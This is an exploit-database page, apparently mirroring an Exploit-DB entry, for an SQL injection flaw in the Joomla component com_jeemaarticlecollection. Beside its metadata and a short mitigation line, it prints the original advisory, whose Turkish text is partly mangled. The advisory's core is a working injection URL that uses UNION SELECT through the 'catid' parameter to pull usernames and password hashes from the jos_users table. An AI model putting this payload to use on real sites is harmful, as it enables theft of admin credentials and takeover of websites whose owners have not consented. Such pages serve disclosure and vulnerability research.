header-logo
Suggest Exploit
vendor:
com_jeemaarticlecollection
by:
Fl0riX
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_jeemaarticlecollection
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_jeemaarticlecollection SQL injection Vulnerability

This vulnerability allows an attacker to gain access to the admin login credentials by exploiting a SQL injection vulnerability in the Joomla Component com_jeemaarticlecollection. The vulnerability exists due to insufficient filtration of malicious characters in the 'catid' parameter of the 'index.php' script.

Mitigation:

Input validation should be implemented to filter out malicious characters.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#############################################################
       Joomla Component com_jeemaarticlecollection SQL injection Vulnerability                                          
#############################################################

#author        : Fl0riX

# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r

# Name        : com_jeemaarticlecollection

# Bug Type       : SQL Injection

# Infection      : Admin login bilgileri al&#65533;nabilir.

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir. Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

# Note : Kimsesizli&#65533;im O Dereceye Vard&#65533; Ki &#65533;evremde Bela Girdab&#65533;ndan Ba&#65533;ka D&#65533;nen Kimse Yok.(!)

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection

< -- bug code end of -- >

Navigation

Suggest Exploit

Services By CQR